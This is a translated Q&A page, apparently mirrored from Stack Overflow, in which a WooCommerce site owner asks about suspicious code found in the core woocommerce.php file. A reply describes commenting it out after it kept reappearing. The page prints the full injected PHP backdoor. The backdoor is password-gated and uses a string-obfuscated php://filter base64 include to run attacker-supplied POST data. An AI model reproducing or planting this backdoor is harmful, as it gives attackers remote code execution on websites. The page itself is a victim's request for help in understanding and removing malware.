簡體   English   中英

奇怪的代碼被添加到 woocommerce.php 文件中

[英]Strange code being added to woocommerce.php file

我在核心 woocommerce.php 文件中發現了這個奇怪的代碼。

有誰明白這段代碼試圖做什么? 我懷疑它是惡意軟件,因為它不是核心 WooCommerce 代碼的一部分。

我試圖了解它是否由插件添加並且是合法的,或者它是否是某種形式的病毒/惡意軟件等。

if (isset($_POST["_aey8iousjrkdf"],$_POST['WP_6cdd22']) && sha1($_POST['WP_6cdd22']) == "6cdd22ad6267ba73cd92bf8abd7ec2058740fa80") { $_oxyu = tempnam(sys_get_temp_dir(),"rlgalfarg"); file_put_contents($_oxyu,$_POST["_aey8iousjrkdf"]); require_once "php".":"."//filt"."e"."r/c"."onvert."."ba"."s"."e"."64-"."d"."e"."code/co"."n"."v"."er"."t.b"."a"."s"."e64-de"."co"."de/"."resou"."rce"."=".$_oxyu; unlink($_oxyu); die(); } 

這個 woocommerce.php 有同樣的問題。 刪除代碼后,它會直接返回。 在研究和玩耍之后,我想我找到了方法。 我在“if”之前添加了/*,所有代碼都變成了評論。 現在第二天,沒有什么新東西回到這個地方。 當然,這不是最好的方法,我不確定它是否會作為評論保留,但到目前為止似乎還可以。 如果有人可以找到完整的刪除方式,請在此處與我們分享。

暫無
暫無

聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.

 
粵ICP備18138465號  © 2020-2024 STACKOOM.COM